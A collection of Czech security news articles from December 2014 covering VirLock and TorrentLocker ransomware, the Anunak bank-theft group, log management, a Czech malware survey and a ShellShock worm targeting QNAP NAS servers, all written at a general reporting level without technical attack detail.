Červy z rodiny ransomware jsou pro podvodníky doslova zlatý důl. Na důvěřivcích díky nim vydělávají milióny. Nyní tuto hrozbu posunuli ještě o úroveň, dokáže se sama rozmnožovat. To je i jeden z důvodů, proč je velmi složité odstranit jej z napadeného systému. Upozornil na to server Security Affairs.
VirLock se stejně jako další hrozby z rodiny ransomware schovává pod hlavičku ochránců zákona.
Nového červa pojmenovali bezpečnostní experti jako VirLock. „VirLock je plnokrevný ransomware, který uzamkne obrazovky svých obětí,“ uvedli výzkumníci z antivirové společnosti Eset.
Nezvaný návštěvník působí jako parazitní virus, který napadá uložené soubory na pevném disku. Dokáže je zašifrovat, aby se k nim uživatel nedostal ani po jeho odinstalování, pokud uživatelé zjistí, že jde skutečně o hrozbu.
Podvodná zpráva vypadá, jako by ji odeslali zaměstnanci FBI
VirLock se totiž stejně jako další hrozby z rodiny ransomware schovává pod hlavičku ochránců zákona. Při zapnutí počítače zobrazí zprávu, že počítač zablokovaly policejní úřady nebo bezpečnostní složky kvůli používání nelegálního softwaru. A k jeho odblokování je nutné zaplatit „výkupné“.
Starý trik, ale funguje...
Přestože první verze ransomwaru se objevila už před několika lety, stále se na tento trik nechají nachytávat tisíce lidí po celém světě. Vzhledem k tomu, že za odblokování počítače piráti požadují 100 dolarů (2000 Kč), vyšplhá se ve výsledku „výkupné“ až na několik stovek tisíc korun denně.
Kolik si jsou hackeři schopni vydělat za jediný den, odhalila již dříve ve svých statistikách antivirová společnost Symantec.
Ke svým datům se lidé nemusejí dostat ani po zaplacení výkupného.
Ani po zaplacení výkupného navíc nemají uživatelé jistotu, že se ke svým datům skutečně dostanou. Virus je nutné z počítače odinstalovat a data následně pomocí speciálního programu odšifrovat. To ale není v případě VirLocku vůbec jednoduché, protože vytváří na pevném disku unikátní instalace, čímž se snaží znesnadnit možnost odstranění ze systému.
Není navíc vyloučeno, že v budoucnu se objeví ještě sofistikovanější verze této hrozby. Replikační schopnosti by mohli kybernetičtí zločinci využít k šíření této hrozby po internetu, například prostřednictvím adresáře v e-mailu.
Vyděrači cílí i na mobily
VirLock se v současnosti zaměřuje výhradně na klasické počítačové systémy. Letos v červnu ale bezpečnostní experti odhalili vyděračský virus, který cílil také na chytré telefony.
Nezvaný návštěvník nazývaný Simplocker se podle analýzy bezpečnostních expertů ukrýval v aplikaci Sex xionix pro přístroje s operačním systémem Android. Nutno podotknout, že tento program se nenacházel v legitimním obchodě Google Play, ale na neoficiálních zdrojích, především nejrůznějších internetových fórech.
Vzorek odhalený v aplikaci Sex xionix komunikuje s uživateli rusky, výkupné má být zaplaceno v ukrajinských hřivnách. Pokud lidé v přepočtu téměř 500 Kč zaplatí, nemají žádnou jistotu, že jejich data budou skutečně zpřístupněna, stejně jako v případě verze pro klasické počítače.
Zajištění vyšší bezpečnosti nemusí stát spoustu peněz
25.12.2014 Bezpečnost
Ani jedna ze dvou nejvyšších bezpečnostních priorit našeho manažera bezpečnosti pro nadcházející fiskál nebude představovat velké investice.
Je období rozpočtů, což znamená, že jsem začal vytvářet seznam svých přání ohledně bezpečnostních specialit, které bych chtěl pořídit. Dávám přednost tematickému seznamu přání. Před rokem to byla ochrana dat. Do prevence ztráty dat a šifrování souborů jsme díky tomu významně investovali.
Pro nadcházející rok mám témata dvě: Zvýšit odolnost našeho ochranného jádra a vzdělávat uživatele. A nebudu ani muset pro žádný z těchto cílů žádat moc peněz.
Za posledních pár let jsme vybudovali docela slušný arzenál nástrojů pro zabezpečení dat. Máme firewally, které nejen omezují provoz, ale také chrání před malwarem, zajišťují prevenci narušení, filtrují URL a omezují přístup na aplikační vrstvě.
Máme také pokročilou prevenci úniku dat, správu událostí zabezpečení, ochranu koncových bodů, šifrování souborů, řízení přístupu k síti atd.
Přetrvávající rizika
Zranitelnosti v naší infrastruktuře však stále existují. Například pravidla našich firewallů lze zpřísnit. Sítě by šlo více segmentovat. Odolnost základu bitové kopie našeho serveru je možné dále zvýšit.
Musíme zlepšit i správu oprav a ochranu koncových bodů a je nezbytné nějak zvládnout i tzv. nemanagovaná zařízení. Mohli bychom zpřísnit i filtry pro URL, zablokovat riskantní aplikace a dělat více kontrol.
Chtěl bych také zavést plné šifrování disku pro všechny koncové body. To bude snadnější uskutečnit, protože zajímavé řešení Microsoft BitLocker je již součástí naší podnikové licence.
Ke zvýšení odolnosti klíčové infrastruktury bychom měli využít naše současné technologie. Další úspory můžeme dosáhnout rozšiřováním funkcí zabezpečení delegovaných do zahraničí.
Technologie jsou pro zajištění bezpečnosti samozřejmě skvělá pomoc, ale nikdy se jim nepodaří eliminovat všechny incidenty. Mezi problematické patří phishingové útoky, sociální inženýrství, stahování nepřátelských programů mimo síť či nežádoucí úniky dat.
Co to všechno má společného? Uživatele. Řekl bych, že by se asi čtyři pětiny našich bezpečnostních incidentů nemusely stát, kdyby někdo prostě myslel na bezpečnost. To je také důvod, proč očekávám, že se nám v následujícím roce vyplatí větší zaměření na povědomí a školení o bezpečnosti.
Přínosná školení
Už nyní máme povinné školení pro zvýšení obecného povědomí a všichni zaměstnanci se ho musejí zúčastnit jednou ročně a musejí potvrdit, že mu rozumějí. Chci však tento program pozvednout na vyšší úroveň.
Za prvé to bude znamenat rozšíření obsahu. Uživatelé se budou s materiály seznamovat pomocí krátkých informativních kurzů o konkrétních tématech z oblasti zabezpečení i dodržování předpisů. Spolupracovat chci s výukovým týmem na poskytování doplňkového povinného školení pro některé zaměstnance na základě jejich pracovního zařazení.
Například divize výzkumu a vývoje by měla mít školení ohledně zabezpečení aplikací, technici linky technické podpory by se zase měli zúčastnit kurzů o sociálním inženýrství a reakci na incidenty.
Členové právního oddělení by naopak měli dostat kurzy o tom, jaké jsou důsledky předpisu PCI pro oblasti soukromí a zabezpečení, a zaměstnanci komunikující se zákazníky by se měli vzdělat v oblasti nakládání s daty.
Budu také usilovat, aby se povědomí o bezpečnosti dostalo do našeho orientačního programu pro nové zaměstnance, a bude-li to možné, budu mít na svých cestách po externích pracovištích přednášky o zabezpečení.
Kromě rozšířeného školení bych rád pracovníky bombardoval připomínkami zvyšujícími jejich znalosti o bezpečnosti, protože častá připomenutí posilují přínos školení, které se koná jen jednou ročně.
Například mám v plánu prosadit spořiče obrazovek obsahující bezpečnostní témata do všech koncových bodů s operačním systémem od firmy Microsoft. V našich oddechových prostorách máme monitory, které zobrazují prodejní kvóty, marketingové materiály a další oznámení společnosti. Proč k tomu čas od času nepřidat obrazovku s připomenutím zásad ochrany dat?
Nakonec hodlám kvůli vyhodnocování efektivity školení jednou za čas rozesílat e-maily maskované jako phishingové útoky a potom dělat statistiky, kolik zaměstnanců se na návnadu chytilo.
Pokud budu svou práci dělat dobře, měl by se tento počet časem zmenšovat.
Tento příspěvek do Zápisníku manažera pro bezpečnost napsal skutečný manažer bezpečnosti, který zde vystupuje jako Mathias Thurman. Jeho pravé jméno ani jméno zaměstnavatele z pochopitelných důvodů neuvádíme.
Skupina hackerů Anunak ukradla z bank přes půl miliardy korun
23.12.2014 Hacking
Sofistikovaná skupina hackerů Anunak ukradla přes pětadvacet milionů dolarů (přes půl miliardy korun) z několika bank v Rusku a zemích bývalého Sovětského svazu.
Se zjištěním přišli experti z bezpečnostních společností Group-IB a Fox-IT, kteří hackerskou skupinu pojmenovali jako Anunak po červu, který ke svým útokům využívá. Narozdíl od většiny jiných hackerských skupin, kteří se zaměřují na samotné spotřebitele,Anunak cíli na samotné instituce, když proniká do jejich interních sítí a na jejich servery. Díky tomuto přístupu byli útočníci schopni převést si peníze na účty, které mají pod vlastní kontrolou a v některých případech ovládli i bankomaty, z nichž si peníze jednoduše vybrali.
„Od roku 2013 získali přístup k sítím více než padesátky ruských bank a pěti platebním systémům a dvěma z těchto institucí byly kvůli tomu zrušeny jejich bankovní licence,“ uvedl Group-IB včera v oficiálním prohlášení. „K dnešnímu dni celkem ukradli přes miliardu rublů (okolo pětadvaceti milionů dolarů), přičemž většina z této částky byla ukradena v druhé polovině roku 2014.“
Útočníci ze skupiny Anunak začínají infikací počítačů běžných zaměstnanců červem, který jim následně otevře dveře do interních sítí. Útočníci používají síťové skenery, keyloggery, SSH backdoory, aplikace pro vzdálenou kontrolu a penetrační testovací framework Metasploit.
Jejich primárním nástrojem však je trojský kůň známý jako Anunak, který je založen na červovi Carberp, jenž slouží ke kradení přihlašovacích údajů do bankovnictví. Zdrojový kód Carberpa unikl na internet v červnu 2013. Group-IB věří, že někteří členové Anunaku dříve patřili do "gangu" Carberp, který se v roce 2013 rozpadl kvůli interním konfliktům.
Útočníci využívají k infikaci počítačů trojanem Anunak řadu metod. Pomocí expolitů zneužívají legitimní stránky, z nichž se následně červ stahuje (podle expertů například v roce 2013 dokázali integrovat nebezpečný kód do webu php.net), ale používají také klasický phishing pomocí e-mailů, kdy se zprávy tváří jako by byly odeslány z ruské centrální banky.
„Tato skupina má úzké styky s vlastníky některých velkých botnetů, které masivně distribuují červy,“ uvedli experti z Group-IB. „Útočníci si kupují od těchto vlastníků botnetů informace o IP adresách počítačů, které jsou v rámci botnetu ovládány a následně zjišťují, zda nepatří nějaké finančí instituci nebo vládní organizaci. Pokud narazí na počítač umístěný v bance, zaplatí vlastníkovi botnetu za to, aby si na něj mohli nainstalovat vlastního červa.“
Bezpečnostní logy jako noční můra? Zbavte se jí
23.12.2014 Bezpečnost
Správci sítě i bezpečnostní manažeři z nich mají respekt a nezbytně je potřebují. Vedoucí pracovníci ale obvykle netuší, o co přesně jde, a systém pro zpracování logů nepodpoří, dokud nezazní klíčové slovo – shoda s regulacemi a zákonnými požadavky. Systémy na správu a vyhodnocování logů však neslouží jen k zaškrtnutí políčka „Zákon o kybernetické bezpečnosti – splněno“, přináší i pomoc při řešení provozních problémů.
Existují odbory a pracovníci, kteří zpracované a vhodně archivované logy ke své činnosti nezbytně potřebují, i když každý z trochu jiného důvodu. Například správci systémů (sítí, bezpečnostních prvků, serverů a aplikací) potřebují logy prohledávat při analýze a řešení provozních problémů.
Pro bezpečnostní manažery zase představují klíč pro vyhodnocování bezpečnostních událostí. A nově, s účinností zákona o kybernetické bezpečnosti, potřebují mít logy kdykoliv připravené pro předložení organizacím zabývajícím se bezpečností – Cesnet Cerst a Cirst nebo Policii ČR.
Společné potíže
Obě skupiny však narážejí na společné problémy. Logy jsou uložené na různých zařízeních, kam mají správci rozdílně omezená přístupová práva, jsou v rozličných formátech, mají různou retenci anebo zařízení mají pro ně vyhrazenou omezenou kapacitu, takže logy jsou k dispozici jen pár dní zpět.
Logy uložené na různých místech lze zpochybnit, modifikovat nebo třeba také záměrně smazat. Právě mazání či pozměnění logů je jednou z činností, které útočník při průniku do systému vždy udělá, aby svoji činnost zakryl.
Centrální úložiště
Řešení spočívá ve vytvoření centrálního úložiště, kam všechna zařízení, servery, systémy, aplikace a databáze své logy ukládají. Jenže ty přicházejí v různých formátech. Síťová a bezpečnostní řešení obvykle posílají logy ve formátu Syslog, který ale není jednotný.
RFC 5424 zase popisuje pouze transportní protokol. Logy z aplikací a operačních systémů pak mají formát „file-based log“ a pro něj není žádný standard. První, co tedy musí centrální úložiště tohoto typu udělat, je normalizace logů.
Ty přicházející se proženou tzv. parsery, které ze surové podoby logu rozdělí všechny informace do příslušných polí v databázi – destination IP, source port, time a další. Tím se to celé sjednotí a je možné s tím dále pracovat.
Parsování logů je ale činnost velmi náročná na výkon systému. Před parsovacím strojem musí být buffer, kam se ukládají data při příjmu. Síťová zařízení a systémy totiž v naprosté většině nemají implementovaný způsob ověření doručení logů. Logy se tak odesílají do „černé díry“ a zařízení se nijak nestarají, zda se i doručí.
Centrální úložiště tedy musí mít dostatečný výkon pro nepřetržitý příjem – daný množstvím událostí za sekundu (EPS, Events Per Second). Definovat, kolik EPS všechna zařízení a systémy v síti vygenerují, je tak trochu jako věštění z křišťálové koule – záleží na typu produktů, množství přenesených dat, počtu přihlášených uživatelů, jestli zařízení zrovna náhodou nečelí útoku a na dalších parametrech.
Pro efektivní sběr logů z celé sítě je potřeba v běžných českých podmínkách tisíce EPS. A pokud to příslušné úložiště nezvládne, musí se zapojit do clusteru, a tím zvýšit výkon.
Centrální úložiště logů také musí podporovat režim vysoké dostupnosti. Ten se obvykle implementuje přímo v databázovém stroji a řeší se prostým přidáváním dalšího stroje do skupiny.
V síti existuje mnoho různých zařízení, a proto je důležité si ověřit, zda se právě ta důležitá plně podporují. Ale pozor, parser musí opravdu rozluštit všechny údaje příchozího logu, nikoliv jen základní, jako jsou čas nebo IP adresy, přičemž to ostatní uloží v nezpracované podobě.
Bez vhodného zpracování bude možné data ve vyhodnocovacím a reportovacím subsystému využít jen ve velmi omezené míře.
Analytické a prezentační rozhraní
V podmínkách tuzemské střední a větší počítačové sítě se vygeneruje zhruba 1,5 miliardy událostí za měsíc, přičemž pro jejich uložení je potřeba nejméně 10 TB. To už jsou big data, nad nimiž se dále pracuje – musejí se prohlížet, třídit, analyzovat či korelovat. Aby uživatelé nemuseli při zadání dotazu do databáze čekat na odpověď hodiny či dny, je nutné, aby úložiště logů mělo opravdu výkonný databázový stroj.
Prezentační rozhraní úložiště logů je to, s čím se pracuje – tady se třídí data, filtrují, vytvářejí dotazy. Je vhodné mít co nejvíce dotazů už připravených, aby je uživatelé nemuseli opakovaně sami vytvářet. A k informacím je dobré se dostat na několik kliknutí.
Vydírání kyberzločinci v Česku jen kvete
19.12.2014 Kriminalita
V tuzemsku zašifroval malware TorrentLocker tisíce počítačů. A desítky obětí zaplatily výkupné, aby jim je zločinci zpětně odemkli. Celkem má TorrentLocker za sebou podle odhadů společnosti Eset globálně 40 tisíc obětí.
Experti Esetu prezentovali detailní analýzu rozsáhlého případu internetového zločinu, kdy vyděrači zašifrují soubory na počítači a požadují výkupné za šifrovací klíče.
Jde o postupně zdokonalovaný malware TorrentLocker, který od jara 2014 infikoval na 40 tisíc počítačů, převážně v Evropě. Analýza provozu řídících serverů botnetu TorrentLocker umožnila zjistit o této vyděračské kampani detailní informace.
Malware TorrentLocker zašifroval na infikovaných počítačích (resp. na všech jejich připojených diskových jednotkách) přes 525 milionů souborů, za jejichž dešifrování požaduje gang vyděračů výkupné. Výkupné zaplatilo pouze 570 obětí; i tak si vyděrači přišli na v přepočtu víc než 580 tisíc dolarů.
V Česku se obětí TorrentLockeru stalo 3420 počítačů, na nichž bylo zašifrováno 35 milionů souborů. Vyděračům zaplatilo 28 obětí z Česka - v průměru to bylo v přepočtu téměř 22 tisíc korun, celkem 611 tisíc korun.
Analytici Esetu zjistili, že zločinci průběžně inovují jak samotný malware, tak metody, jimiž pracují. Například první verze malwaru používala jednodušší šifrování, které bylo možné obejít.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Poté, co některé bezpečnostní firmy prezentovaly službu, která obětem TorrentLockeru jejich soubory zdarma dešifrovala, zločinci přešli na dokonalejší šifrovací metodu CBC (Cipher block chaining). V důsledku toho je zaplatit výkupné opravdu jedinou možností, jak se k zašifrovaným datům dostat.
Zdokonalení se dočkala i komunikace o zaplaceném výkupném. Zatímco oběti prvních vln útoků musely informovat vyděrače mailem a stejným kanálem také putovaly šifrovací klíče, v další fázi byl tento proces plně automatizován.
TorrentLocker se šíří s využitím elektronické pošty. Oběť dostane e-mail, který obsahuje buď škodlivou přílohu, nebo link na stránku, odkud si má škodlivý kód stáhnout. Záminky jsou ve všech případech podobné: jde o upozornění na údajný balík na cestě, na údajně nezaplacenou fakturu nebo pokutu a podobně.
TorrentLocker je sice funkčně velmi podobný neméně obávanému malwaru CryptoLocker, ale analytici zjistili, že za ním se vší pravděpodobnosti stojí jiný gang - ten, který má na svědomí úspěšný bankovní malware Hesperbot.
Nejen, že hlavními terči byly v obou případech Turecko, Austrálie a Česká republika; tyto škodlivé kódy používají stejné adresy řídících serverů, sdílí části programového kódu a dokonce nejspíš byly zkompilovány na tomtéž počítači.
České firmy o atacích na svou infrastrukturu často ani nevědí
19.12.2014 Hrozby
Zářijový průzkum v České republice ukázal, že třetina tuzemských organizací byla v posledním roce napadená některým typem malwarového útoku. To jsou ale jen ty, které o ataku věděly.
O rok dříve to sice bylo 54 %, ale nejedná se o žádný pozitivní trend, protože překvapivě přes 40 % dotázaných v aktuální anketě nevědělo, jestli k podobnému úspěšnému útoku došlo, což ukazuje na určitou lhostejnost a výrazné podcenění rizik. Ztráty na pověsti i přímé náklady na odstranění škod mohou znamenat vysoké investice.
Podobná situace je i v oblasti počtu útoků. Zatímco v roce 2013 téměř polovina napadených firem (48 %) uvedla, že čelily 5 a více útokům za uplynulých 12 měsíců a 9 % dokonce zaznamenalo více než 50 útoků, při současném průzkumu více než polovina neuměla určit, kolik takových útoků bylo.
S nárůstem hrozeb v kombinaci se špatnou implementací bezpečnostních i analytických řešení může souviset nedostatečné vyhodnocování útoků a škod, protože je potom obtížnější vyhodnotit čas strávený opravami.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Malwarové útoky jsou stále důmyslnější a složitější. V roce 2013 uvedlo 34 % respondentů, že během 12 měsíců strávili 4 a více dnů opravami a obnovením systémů po útocích škodlivého kódu. Letošní průzkum potvrzuje poměrně zásadní neznalost vlastní sítě, téměř 40 % dotázaných nevědělo, kolik pracovních dnů za poslední rok strávili opravou a obnovou systémů po malwarovém útoku. Více než polovina odhaduje, že to bylo méně než 1 den.
Podobně jako v roce 2013 uvedli respondenti jako hlavní důvod úspěšnosti malwarových útoků nedostatek informací o bezpečnostní politice a postupech ze strany uživatelů.
Druhým nejčastějším důvodem jsou sofistikované metody malwarových útoků, které je těžké odhalit. Naopak nově je na třetím místě jako důvod úspěšnosti útoků větší množství zranitelností nultého dne, než jaké dokáží bezpečnostní řešení detekovat. Následují pokročilé techniky sociálního inženýrství a zvýšená aktivita uživatelů na sociálních sítích.
Podobně jako v roce 2013 uvedli respondenti jako hlavní důvod úspěšnosti malwarových útoků nedostatek informací o bezpečnostní politice a postupech ze strany uživatelů. Druhým nejčastějším důvodem jsou sofistikované metody malwarových útoků, které je těžké odhalit. Naopak nově je na třetím místě jako důvod úspěšnosti útoků větší množství zranitelností nultého dne, než jaké dokáží bezpečnostní řešení detekovat. Následují pokročilé techniky sociálního inženýrství a zvýšená aktivita uživatelů na sociálních sítích.
Červ využívající ShellShock si našel nový cíl
17.12.2014 Viry
Bezpečnostní experti objevili novou verzi červa, který využívá bezpečnostní trhlinu zvanou ShellShock. Ten se nyní zaměřuje na domácí NAS servery od společnosti QNAP. Jde o datová úložiště, která se v poslední době těší velké popularitě v domácnostech i malých firmách.
„Ačkoliv záplata pro zařízení QNAP, která řeší známou zranitelnost ShellShock, existuje již od října, stále je mnoho zařízení, na kterých nebyla aplikována. Důvodem je určitá obtížnost tohoto kroku z pohledu běžného uživatele,“ uvedl Pavel Bašta z Národního bezpečnostního týmu CSIRT.CZ.
Podle něj červ ve chvíli, kdy se zahnízdí v NAS serveru, spustí jednoduchý skript, který otevře do systému zadní vrátka a umožní tak stažení dalších nezvaných návštěvníků. Nad napadeným strojem tak získá zcela kontrolu.
S ohledem na hrozící nebezpečí by tak lidé neměli s instalacemi aktualizací nijak otálet. Není navíc vyloučeno, že v budoucnu se kyberzločinci zaměří na NAS servery jiných výrobců. Například letos v srpnu si vyděračský virus Cryptolocker vzal na mušku přístroje společnosti Synology.
V ohrožení bylo přes 500 miliónů počítačů
Chyba přezdívaná ShellShock se vyskytuje v bashi operačního systému, tedy v softwarové komponentě, která interpretuje příkazový řádek. Trhlinu útočník může zneužít k ovládnutí prakticky jakéhokoliv počítače, který používá bash.
Podle některých bezpečnostních expertů je ShellShock horší než Chyba krvácejícího srdce (Heartbleed Bug), která byla odhalena letos na jaře. Ta se týkala šifrovací knihovny OpenSSL a zasáhla dvě třetiny celého internetu.
Podle odhadů bezpečnostních expertů je po celém světě kvůli ShellShocku potenciálně ohroženo více než 500 miliónů počítačů a webových serverů. V Česku by jich mělo být několik desítek tisíc.
Pro drtivou většinu počítačových systémů jsou k dispozici záplaty už od podzimu. Jedinci, kteří je však zatím ještě nenainstalovali, nejsou stále chráněni.